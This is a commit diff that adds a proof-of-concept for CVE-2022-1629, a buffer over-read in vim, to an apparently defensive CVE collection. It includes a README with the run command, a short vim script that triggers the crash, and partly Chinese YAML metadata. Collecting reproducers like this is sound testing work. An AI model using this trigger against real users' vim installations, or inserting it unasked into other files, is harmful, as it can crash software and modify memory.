ADD CVE_2022_1629

cve/vim/2022/CVE-2022-1629/README.md

@@ -0,0 +1,14 @@
+
+# CVE-2022-1629 Proof-of-Concept
+
+### Overview
+
+Buffer Over-read in function find_next_quote in GitHub repository vim/vim prior to 8.2.4925. This vulnerabilities are capable of crashing software, Modify Memory, and possible remote execution
+For a comprehensive understanding, check out the accompanying [blog post](https://nvd.nist.gov/vuln/detail/cve-2022-1629) for in-depth details.
+
+### Usage
+
+Run the PoC:
+```
+vim -u NONE -X -Z -e -s -S ./poc_h4_s.dat -c :qa!
+```

cve/vim/2022/CVE-2022-1629/poc_h4_s.dat

@@ -0,0 +1,6 @@
+se encoding=iso8859
+fu R()
+sil!normi"\
+cal R()
+endf
+cal R()

cve/vim/2022/yaml/CVE-2022-1629.yaml

@@ -0,0 +1,20 @@
+id: CVE-2022-1629
+source: https://huntr.dev/bounties/e26d08d4-1886-41f0-9af4-f3e1bf3d52ee/
+info:
+  name: Vim是一款基于UNIX平台的编辑器。
+  severity: Medium
+  description: |
+    Vim 8.2.4925之前版本存在安全漏洞，该漏洞源于find_next_quote函数的缓冲区过度读取，从而导致软件崩溃、修改内存和远程执行。
+  scope-of-influence:
+    vim< 8.2.4925
+  reference:
+    - https://www.cnnvd.org.cn/home/globalSearch?keyword=CVE-2022-1629
+    - https://nvd.nist.gov/vuln/detail/CVE-2022-1629
+  classification:
+    cvss-metrics:  CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H
+    cvss-score: 6.6
+    cve-id: CVE-2022-1629
+    cwe-id: CWE-126
+    cnvd-id: None
+    kve-id: None
+  tags: 缓冲区错误

openkylin_list.yaml

@@ -79,6 +79,7 @@ cve:
     - CVE-2022-0685
     - CVE-2022-0714
     - CVE-2022-0729
+    - CVE-2022-1629
     - CVE-2022-1771
     - CVE-2022-2206
     - CVE-2022-2257